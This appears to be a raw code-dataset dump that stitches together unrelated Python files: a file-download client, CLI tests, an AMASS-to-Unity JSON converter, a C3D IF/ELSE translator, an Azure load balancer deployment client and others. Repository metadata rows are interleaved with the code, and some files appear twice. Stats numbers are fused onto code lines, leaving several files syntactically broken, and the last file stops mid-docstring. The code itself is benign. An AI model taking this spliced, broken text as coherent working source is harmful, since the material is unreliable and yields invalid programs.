    def download(self, settings: DownloadSettings = None) -> bytes:
        """Used to download the file into memory.
        Parameters
        ----------
        settings : DownloadSettings, optional
            Extra request parameters/headers; by default None.
        Returns
        -------
        bytes
        """
        if not settings:
            params = {"fileId": self.file_id}
            headers = None
        else:
            params = {"fileId": self.file_id, **settings.parameters}
            headers = settings.headers
        return cast(
            bytes,
            self._context._get(
                url=self._context._routes.file.download_by_id,
                headers=headers,
                params=params,
                resp_json=False,
                include_account=False,
            )
        )
    def download_iterate(self) -> None:
        """This doesn't work; only here for an API identical to the
        awaiting client.
        Raises
        ------
        AwaitingOnly
            Raised because this call is supported on the awaiting
            client only.
        """
        raise AwaitingOnly()
    def save(self, settings: DownloadSettings, pathway: str) -> None:
        """Used to save the file to a local pathway.
        Parameters
        ----------
        settings : DownloadSettings
        pathway : str
            Local pathway to save to.
        """
        with open(pathway, "wb") as f:
            f.write(self.download(settings))
| 0 | 4,911 | 23 |
dada64951a88cc9b3c1e8529d630a408834f5716 | 1,649 | py | Python | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 7 | 2017-07-15T12:44:23.000Z | 2020-03-24T09:45:11.000Z | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 13 | 2017-07-05T09:34:09.000Z | 2021-04-20T08:18:46.000Z | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 9 | 2017-06-29T13:51:35.000Z | 2021-06-26T21:00:49.000Z | from tests.cli import make_client, run_cmd
from tests.util import answers
| 28.929825 | 65 | 0.740449 | from tests.cli import make_client, run_cmd
from tests.util import answers
def test_capabilities_show_licenses():
    """`capabilities show licenses` returns the single known license."""
    client = make_client(return_value=answers.CAPABILITIES_LIST)
    licenses = run_cmd(['capabilities show licenses'], client, json_output=True)
    assert len(licenses) == 1
    assert licenses[0]['type'] == 'license_windows_2012_standard'
def test_capabilities_show_regions():
    """`capabilities show regions` lists all three zones."""
    client = make_client(return_value=answers.CAPABILITIES_LIST)
    regions = run_cmd(['capabilities show regions'], client, json_output=True)
    assert len(regions) == 3
def test_capabilities_show_resources():
    """`capabilities show resources` lists all ten resources."""
    client = make_client(return_value=answers.CAPABILITIES_LIST)
    resources = run_cmd(['capabilities show resources'], client, json_output=True)
    assert len(resources) == 10
def test_capabilities_show_subnets():
    """`capabilities show subnets` exposes the single ipv4 /29 subnet."""
    client = make_client(return_value=answers.CAPABILITIES_LIST)
    subnets = run_cmd(['capabilities show subnets'], client, json_output=True)
    assert len(subnets) == 1
    first = subnets[0]
    assert first['type'] == 'ipv4'
    assert first['prefix_length'] == '29'
    assert 'availability' in first
def test_capabilities_show_traffic():
    """`capabilities show traffic` lists all three granularities."""
    client = make_client(return_value=answers.CAPABILITIES_LIST)
    traffic = run_cmd(['capabilities show traffic'], client, json_output=True)
    assert len(traffic) == 3
| 1,455 | 0 | 115 |
c40c41135506377f0f359d5c0a330b5d9eec0701 | 4,699 | py | Python | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | # Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
if __name__ == "__main__":
main() | 35.870229 | 118 | 0.633326 | # Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
class AMASSDataConverter:
    """Converts AMASS SMPLH .npz body-animation files into Unity-readable .json.

    AMASS stores per-joint rotations as axis-angle (exponential map) vectors;
    Unity consumes quaternions, so this class performs the conversion and
    gathers everything into one JSON-serializable dict (``data_as_dict``).
    """

    # SMPLH Parameters
    JOINTS = 52
    ROTATION_VECTOR_DIMENSIONS = 3
    QUATERNION_DIMENSIONS = 4

    # Attribute declarations for static typing.
    gender: np.ndarray
    betas: np.ndarray
    poses: np.ndarray
    dmpls: np.ndarray
    trans: np.ndarray
    frames: int
    fps: int
    poses_as_quaternion: np.ndarray

    def __init__(self, npz_file_path: str, show_messages=True):
        """Load the .npz file and prepare the JSON-ready dict.

        Parameters
        ----------
        npz_file_path : str
            Path to an AMASS SMPLH .npz animation file.
        show_messages : bool, optional
            Print progress/diagnostic messages, by default True.
        """
        self.show_messages = show_messages
        self.npzFile = npz_file_path

        # Load npz file
        self.data = self.load_data()

        # Read data from loaded file
        self.read_data()

        # AMASS poses are exponential rotation vectors, unity needs quaternions.
        reshaped_poses = np.reshape(self.poses, [self.poses.shape[0], self.JOINTS, self.ROTATION_VECTOR_DIMENSIONS])
        self.convert_poses_to_quaternions(reshaped_poses)

        # JSON is a dictionary-based format, so collect everything in one dict.
        self.data_as_dict = {
            "gender": self.gender,
            "trans": self.trans,
            "poses": self.poses_as_quaternion,
            "betas": self.betas,
            "dmpls": self.dmpls,
            "fps": self.fps,
        }

    def convert_poses_to_quaternions(self, reshaped_poses):
        """Convert (frames, JOINTS, 3) rotation vectors to (frames, JOINTS, 4) quaternions.

        Uses scipy's batched Rotation API instead of a per-frame/per-joint
        Python loop — same values (x, y, z, w order), much faster on long clips.
        """
        flat_rotvecs = reshaped_poses.reshape(-1, self.ROTATION_VECTOR_DIMENSIONS)
        quaternions = Rotation.from_rotvec(flat_rotvecs).as_quat()
        self.poses_as_quaternion = quaternions.reshape(
            self.frames, self.JOINTS, self.QUATERNION_DIMENSIONS)

    @staticmethod
    def default_encoding(obj):
        """json.dumps fallback encoder: converts numpy types to plain Python.

        Raises TypeError for anything that is not a numpy scalar/array.
        """
        if type(obj).__module__ == np.__name__:
            if isinstance(obj, np.ndarray):
                return obj.tolist()
            else:
                return obj.item()
        raise TypeError('Unknown type:', obj.__class__ if False else type(obj))

    def read_data(self):
        """Pull the individual arrays out of the loaded npz data."""
        # NOTE(review): gender is hard-coded to 'male'; the original
        # self.data['gender'] read is commented out below — confirm intended.
        self.gender = 'male'
        #self.data['gender'].astype(str)
        self.betas = self.data['betas']
        self.poses = self.data['poses']
        self.dmpls = self.data['dmpls']
        self.trans = self.data['trans']
        self.frames = self.poses.shape[0]
        # Round the mocap framerate to the nearest integer fps.
        self.fps = int(np.rint(self.data['mocap_framerate']))

        if self.show_messages:
            print(f"Created converter for file: {self.npzFile}")
            print(f'\tgender: {self.gender}')
            print(f'\tbetas: {self.betas.shape}')
            print(f'\tposes: {self.poses.shape}')
            print(f'\tdmpls: {self.dmpls.shape}')
            print(f'\ttrans: {self.trans.shape}')
            print(f'\tframes detected: {self.frames}')
            print(f'\tfps: {self.fps}')

    def load_data(self):
        """Load the npz file; prints a warning and returns None on failure."""
        # noinspection PyBroadException
        try:
            data = np.load(self.npzFile)
            return data
        except Exception:
            # NOTE(review): best-effort skip — callers will then fail in
            # read_data with a clearer-than-silent error.
            print(f'Could not read {self.npzFile}! Skipping...')
            return None

    def write_to_json(self, json_path: str):
        """Serialize the converted animation to a .json file.

        Parameters
        ----------
        json_path : str
            Destination path; must end in ``.json``.
        """
        if self.show_messages:
            print(f"\nWriting to json... {json_path}")

        filename, file_extension = os.path.splitext(json_path)
        if file_extension != '.json':
            print(f"Incorrect extension specified ({file_extension}). Needs to be .json.")
            return

        dumped = json.dumps(self.data_as_dict, default=self.default_encoding, indent=4)
        with open(json_path, 'w') as f:
            f.write(dumped)

        if self.show_messages:
            print('\n *** DONE CONVERSION ***\n')
def main():
    """CLI entry point: ``convert_to_unity_json.py <source.npz> <dest.json>``.

    Validates the argument count, then converts argv[1] (npz) into argv[2]
    (json).  (Fix: the trailing line of this block had dataset stats columns
    fused onto it, making the file invalid Python.)
    """
    if len(sys.argv) != 3:
        print("Not the right number of arguments. First should be source npz file path, second should be destination "
              "json path.")
        return
    converter = AMASSDataConverter(sys.argv[1])
    converter.write_to_json(sys.argv[2])


if __name__ == "__main__":
    main()
16ecfe92c17399c41032ef0e4fe40d1863d16039 | 5,128 | py | Python | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 35 | 2020-12-07T03:11:43.000Z | 2021-04-15T17:38:16.000Z | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 47 | 2020-12-09T01:29:09.000Z | 2021-01-13T05:37:50.000Z | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 556 | 2020-12-07T03:13:31.000Z | 2021-06-17T17:41:10.000Z | from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
# Reglas de optimizacion
# Regla 4
# Regla 5 | 33.083871 | 108 | 0.573908 | from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
class SIELSE(NodoArbol):
    """AST node for an IF/ELSE statement; emits three-address code (C3D).

    ``traducir`` evaluates the condition, jumps to a true label (body) or a
    false label (contrabody), and joins at a common exit label.  The three
    optimization-report variants (Regla 3/4/5) previously duplicated ~30
    lines each, differing only in the "optimized" text recorded; the shared
    emission now lives in ``_emitir_if_else``.
    """

    def __init__(self, exp, body, contrabody, line, coliumn):
        super().__init__(line, coliumn)
        self.exp = exp                  # condition expression node
        self.body = body                # statements of the true branch
        self.contrabody = contrabody    # statements of the else branch
        self.linea = line
        self.columna = coliumn

    def analizar_semanticamente(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        """Semantic analysis — intentionally a no-op for this node."""
        pass

    def traducir(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        """Translate the IF/ELSE to C3D, dispatching to the rule 4/5 variants
        when the condition expression qualifies, else applying rule 3."""
        # NOTE(review): the validators receive the Arbol *class* (not the
        # `arbol` instance), exactly as in the original code — confirm intended.
        if self.exp.validador_Regla4(entorno, Arbol):
            return self.traducir_regla4(entorno, arbol)
        if self.exp.validador_Regla5(entorno, Arbol):
            return self.traducir_regla5(entorno, arbol)
        # Regla 3: "if v goto Bv goto Bf" reduces to "if v goto Bf".
        return self._emitir_if_else(
            entorno, arbol, 'Regla 3',
            lambda validacion, bv, bf: "if " + validacion + " goto " + bf)

    def execute(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        """Interpretation — not implemented for this node."""
        pass

    def getString(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        pass

    def getValueAbstract(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        pass

    # Optimization-rule variants: identical C3D, different report entry.
    def traducir_regla4(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        """Regla 4: the conditional jump reduces to "goto Bv"."""
        return self._emitir_if_else(
            entorno, arbol, 'Regla 4',
            lambda validacion, bv, bf: "goto " + bv)

    def traducir_regla5(self, entorno: Tabla_de_simbolos, arbol: Arbol):
        """Regla 5: the conditional jump reduces to "goto Bf"."""
        return self._emitir_if_else(
            entorno, arbol, 'Regla 5',
            lambda validacion, bv, bf: "goto " + bf)

    def _emitir_if_else(self, entorno, arbol, regla, optimizado_de):
        """Shared C3D emission for all three translation variants.

        Parameters
        ----------
        regla : str
            Report tag ('Regla 3' / 'Regla 4' / 'Regla 5').
        optimizado_de : callable
            (validacion, Bv, Bf) -> the "optimized" C3D string recorded in
            the optimization report.
        """
        Bv = arbol.getLabel()
        Bf = arbol.getLabel()
        validacion = str(self.exp.traducir(entorno, arbol))
        Btemporal = arbol.getLabel()

        # if <cond>: goto Bv  else: goto Bf
        arbol.addC3D("if " + validacion + ':')
        arbol.addIdentacion()
        arbol.addC3D("goto ." + str(Bv))
        arbol.popIdentacion()
        arbol.addC3D('else:')
        arbol.addIdentacion()
        arbol.addC3D("goto ." + Bf)
        arbol.popIdentacion()

        # True branch.
        arbol.addC3D('label .' + Bv)
        for item in self.body:
            item.traducir(entorno, arbol)
        arbol.addC3D("goto ." + Btemporal)

        # Else branch.
        arbol.addC3D('label .' + Bf)
        for item in self.contrabody:
            item.traducir(entorno, arbol)

        # Common exit label.
        arbol.addC3D('label .' + Btemporal)

        # Record the optimization opportunity for the report.
        original = "if " + validacion + " goto " + str(Bv) + ' goto ' + str(Bf)
        reportero = ReporteOptimizacion(
            regla, original, optimizado_de(validacion, str(Bv), str(Bf)),
            str(self.linea), str(self.columna))
        arbol.ReporteOptimizacion.append(reportero)
        return
b79dfb2731620c5e4b9d0314f5a7523683aeb4e4 | 577 | py | Python | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | # coding: utf-8
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
| 28.85 | 137 | 0.667244 | # coding: utf-8
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
def test_strtodate():
pattern = ".*(?P<year>\w{4})_(?P<month>\w{2})_(?P<day>\w{2})-(?P<hour>\w{2})_(?P<minute>\w{2})_(?P<second>\w{2})_(?P<millisecond>\w{3})"
string = "testing_2017_06_08-12_19_44_091_cam_bot.png"
date = strtodate(pattern, string)
assert(date)
assert(date.year == 2017)
assert(date.month == 6)
assert(date.day == 8)
assert(date.hour == 12)
assert(date.minute == 19)
assert(date.second == 44)
assert(date.microsecond == 91000)
| 432 | 0 | 23 |
4ab81df6dbe52b14c06f999571d26610f09615e1 | 9,696 | py | Python | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | 2 | 2020-07-22T18:53:05.000Z | 2021-09-11T05:52:33.000Z | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
"""LbOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def create_or_update(
self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
"""
Create or update a virtual machine.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param load_balancer_name: Name for load balancer.
:type load_balancer_name: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param backend_pool_name: Name of load balancer backend pool.
:type backend_pool_name: str
:param dns_name_type: Associate VMs with a public IP address to a DNS
name. Possible values include: 'none', 'new'
:type dns_name_type: str or :class:`dnsNameType
<lbcreationclient.models.dnsNameType>`
:param frontend_ip_name: Name of the frontend IP configuration.
:type frontend_ip_name: str
:param location: Location for load balancer resource.
:type location: str
:param private_ip_address: Static private IP address to use.
:type private_ip_address: str
:param private_ip_address_allocation: Private IP address allocation
method. Possible values include: 'dynamic', 'static'
:type private_ip_address_allocation: str or
:class:`privateIpAddressAllocation
<lbcreationclient.models.privateIpAddressAllocation>`
:param public_ip_address: Name or ID of the public IP address to use.
:type public_ip_address: str
:param public_ip_address_allocation: Public IP address allocation
method. Possible values include: 'dynamic', 'static'
:type public_ip_address_allocation: str or
:class:`publicIpAddressAllocation
<lbcreationclient.models.publicIpAddressAllocation>`
:param public_ip_address_type: Type of Public IP Address to associate
with the load balancer. Possible values include: 'none', 'new',
'existingName', 'existingId'
:type public_ip_address_type: str or :class:`publicIpAddressType
<lbcreationclient.models.publicIpAddressType>`
:param public_ip_dns_name: Globally unique DNS Name for the Public IP
used to access the Virtual Machine (new public IP only).
:type public_ip_dns_name: str
:param subnet: The subnet name or ID to associate with the load
balancer. Cannot be used in conjunction with a Public IP.
:type subnet: str
:param subnet_address_prefix: The subnet address prefix in CIDR
format (new subnet only).
:type subnet_address_prefix: str
:param subnet_type: Use new, existing or no subnet. Possible values
include: 'none', 'new', 'existingName', 'existingId'
:type subnet_type: str or :class:`subnetType
<lbcreationclient.models.subnetType>`
:param tags: Tags object.
:type tags: object
:param virtual_network_name: The VNet name containing the subnet.
Cannot be used in conjunction with a Public IP.
:type virtual_network_name: str
:param vnet_address_prefix: The virtual network IP address prefix in
CIDR format (new subnet only).
:type vnet_address_prefix: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DeploymentLb')
# Construct and send request
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
| 52.129032 | 694 | 0.680693 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
    """LbOperations operations.

    Auto-generated (AutoRest) client for the load-balancer deployment
    long-running operation.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    def __init__(self, client, config, serializer, deserializer):
        # Keep handles to the shared HTTP pipeline client and the model
        # (de)serializers; `config` carries api_version, timeouts, etc.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer

        self.config = config

    def create_or_update(
            self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
        """
        Create or update a virtual machine.

        :param resource_group_name: The name of the resource group. The name
         is case insensitive.
        :type resource_group_name: str
        :param deployment_name: The name of the deployment.
        :type deployment_name: str
        :param load_balancer_name: Name for load balancer.
        :type load_balancer_name: str
        :param content_version: If included it must match the ContentVersion
         in the template.
        :type content_version: str
        :param backend_pool_name: Name of load balancer backend pool.
        :type backend_pool_name: str
        :param dns_name_type: Associate VMs with a public IP address to a DNS
         name. Possible values include: 'none', 'new'
        :type dns_name_type: str or :class:`dnsNameType
         <lbcreationclient.models.dnsNameType>`
        :param frontend_ip_name: Name of the frontend IP configuration.
        :type frontend_ip_name: str
        :param location: Location for load balancer resource.
        :type location: str
        :param private_ip_address: Static private IP address to use.
        :type private_ip_address: str
        :param private_ip_address_allocation: Private IP address allocation
         method. Possible values include: 'dynamic', 'static'
        :type private_ip_address_allocation: str or
         :class:`privateIpAddressAllocation
         <lbcreationclient.models.privateIpAddressAllocation>`
        :param public_ip_address: Name or ID of the public IP address to use.
        :type public_ip_address: str
        :param public_ip_address_allocation: Public IP address allocation
         method. Possible values include: 'dynamic', 'static'
        :type public_ip_address_allocation: str or
         :class:`publicIpAddressAllocation
         <lbcreationclient.models.publicIpAddressAllocation>`
        :param public_ip_address_type: Type of Public IP Address to associate
         with the load balancer. Possible values include: 'none', 'new',
         'existingName', 'existingId'
        :type public_ip_address_type: str or :class:`publicIpAddressType
         <lbcreationclient.models.publicIpAddressType>`
        :param public_ip_dns_name: Globally unique DNS Name for the Public IP
         used to access the Virtual Machine (new public IP only).
        :type public_ip_dns_name: str
        :param subnet: The subnet name or ID to associate with the load
         balancer. Cannot be used in conjunction with a Public IP.
        :type subnet: str
        :param subnet_address_prefix: The subnet address prefix in CIDR
         format (new subnet only).
        :type subnet_address_prefix: str
        :param subnet_type: Use new, existing or no subnet. Possible values
         include: 'none', 'new', 'existingName', 'existingId'
        :type subnet_type: str or :class:`subnetType
         <lbcreationclient.models.subnetType>`
        :param tags: Tags object.
        :type tags: object
        :param virtual_network_name: The VNet name containing the subnet.
         Cannot be used in conjunction with a Public IP.
        :type virtual_network_name: str
        :param vnet_address_prefix: The virtual network IP address prefix in
         CIDR format (new subnet only).
        :type vnet_address_prefix: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns :class:`DeploymentExtended
         <default.models.DeploymentExtended>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        """
        # Bundle all keyword options into the generated request model.
        parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)

        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
            'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'DeploymentLb')

        # Construct and send request
        def long_running_send():
            # Initial PUT that starts the long-running deployment.
            request = self._client.put(url, query_parameters)
            return self._client.send(
                request, header_parameters, body_content, **operation_config)

        def get_long_running_status(status_link, headers=None):
            # Poll the operation-status link returned by the service.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)

        def get_long_running_output(response):
            # Map the final response to a model (or raise CloudError).
            if response.status_code not in [200, 201]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            deserialized = None

            if response.status_code == 200:
                deserialized = self._deserialize('DeploymentExtended', response)
            if response.status_code == 201:
                deserialized = self._deserialize('DeploymentExtended', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        if raw:
            # raw=True: send once and return the direct response, no polling.
            response = long_running_send()
            return get_long_running_output(response)

        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
d68f9630a99eb9518e8240ecbf2ea45e3960cb5d | 111 | py | Python | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | 3 | 2016-10-24T13:26:45.000Z | 2020-10-12T17:44:00.000Z | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | null | null | null | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
math()
| 13.875 | 29 | 0.504505 | def math():
for i in range(97, 123):
print(i, 'e', chr(i))
if __name__ == '__main__':
math()
| 49 | 0 | 22 |
53f161c236da9d5618f68b4dac2da82c740c07d7 | 4,081 | py | Python | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | 2 | 2021-11-02T13:42:16.000Z | 2021-11-03T12:23:03.000Z | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | null | null | null | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
    """argparse ``type=`` callback: verify that *x* names an existing path.

    Returns the path unchanged when it exists; otherwise raises
